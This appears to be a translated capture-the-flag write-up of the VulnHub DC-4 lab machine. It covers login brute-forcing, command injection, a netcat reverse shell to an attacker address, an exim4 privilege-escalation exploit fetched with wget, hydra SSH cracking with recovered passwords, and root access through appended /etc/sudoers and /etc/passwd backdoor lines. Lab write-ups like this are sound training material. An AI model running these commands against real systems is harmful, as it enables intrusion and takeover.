DC-4
DC: 4 ~ VulnHub
Article directory
-
-
- DC-4
- collect message
- web penetration
- exploit
- Exploiting vulnerabilities to obtain shell
- Elevate privileges 1
- Privilege escalation 2
- Summarize
-
Information collection
- Use nmap to scan the 192.168.78.153 network segment where the target machine is located. Then scan the detailed content and find that website 80 and ssh port 22 are open. I feel like I need to get the username and password to connect through ssh.
web penetration
- When accessing the website, it is a login window. According to the title, the admin prompt is given. It feels that the user name is admin. After checking around, there is no prompt. It seems that the password must be cracked.
- The experience given by the web 1 target machine, and then use dirb to scan it, it’s very good, just blast it directly.
- Input the parameters to submit the packet capture, send it to the attack module, load the weak password file, blast it, and get the password as happy
- After logging in, I found that there are several functions. After executing them, I found that they were all Linux system commands. There was no place to enter commands. I had an idea and captured the packet. Will the command execution statement be displayed?
Exploiting vulnerabilities
- As expected, I can really capture the packet and see the execution command, so I start modifying the command to see if it is feasible. The incoming id is found to be returned successfully. There is an rce command execution vulnerability.
- Since you can directly execute system commands, use nc to bounce the current web user’s shell to the virtual machine. Enter
nc -e /binbash 192.168.78.145 7777
- Of course, the first reaction was to write a Trojan file, but the attempt failed. I tried writing in kali and found that the parameters were gone. Even the file is not created when writing in burp, maybe the permissions are not enough.
Exploit vulnerability to obtain shell
- Convert the rebound shell into an interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
- First go to the home file and see if there are any files you can view.
- Check etc/passwd and find that there are three users with more than 1000 users. It seems that ssh switching users is indispensable.
- After checking the files, I found that there is a backup password in the jim folder.
Elevate privileges 1
- Use the find command to find suid privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
I found an exim4. I have used this privilege escalation before. Check the version.
- Looking at version 4.89, it seems that there is a gap between the vulnerable versions that can perform local privilege escalation.
searchsploit exim
Find exploitable privilege escalation POC and find the target
- Save the script to the desktop
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh
- Check the file end format of the POC and find that it is still the Windows version, so change it to the Linux version.
- Import the script file into /var/www/html, and use wget to download the privilege escalation script to the target machine.
Start the Apache service sudo service apache2 start cp 1.sh /var/www/html/1.sh chmod 777 1.sh wget http://192.168.78.128/1.sh
- Execute script to escalate privileges and view
- View flag file
Privilege Elevation 2
- Now that there is a password file, the username must be the ones in the home folder. Use hydra for ssh blasting
hydra.exe -L user.txt -P DC-4pass.txt ssh://192.168 .78.153
jim : jibril04
- Log in to jim user using ssh
- After checking around, there is nothing to check, and I can’t find the passwords of other users
grep -rns charles
. After checking wp, I found that I need to check /etc/mail. I can check the charles user sent to jim. password
- It is understood that the jim user has the right to access the mbox file. After checking the file content, it was found to be an email message, so I changed my mind to the /etc/mail email message. And mbox is also a format for email messages.
- Login account
ssh [email protected]
Password:^xHhA & amp;hvim0y
- Use suid -l to check the permissions of the current user and find that you can use root permissions to execute
/usr/bin/teehee
without a password
- Looking at how to use teehee, we found that the -a parameter can write the content to a file without overwriting it. This makes it inevitable to think that the DC-9 target drone can write the /etc/passwd account password, and it can also write / etc/sudoers Another account has all root permissions
- So now proceed to upgrade the charles user to have root permissions
charles ALL=(ALL:ALL) ALL
payloadecho "charles ALL=(ALL:ALL) ALL" | sudo teehee - a /etc/sudoers
- sudo -l found that the user does have root privileges. Directly use sudo su to upgrade to root privileges and enter the password.
- Get flag
Summary
The DC-4 target drone this time feels quite easy. At least it is the first time to go directly from the target drone to the privilege escalation part. I did not look at wp because the exim4 vulnerability POC has been used before, so I directly escalate the privilege to root. During a routine privilege escalation, I checked the email message file and found the hidden password.
- Brute force login website
- The shell command execution directly bounces the shell to kali.
- find found exim4 privilege escalation POC suid privilege escalation
- wget downloads files from the virtual machine website and cannot upload the files to the target machine.
- hydra blasts ssh login
- mbox mail format file /etc/mail saves mail information
- Use –help to view the usage of teehee
- You can write files at will. You can try to write the new account root permissions to /etc/passwd. You can give the current account all root permissions /etc/sudoers.
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers ``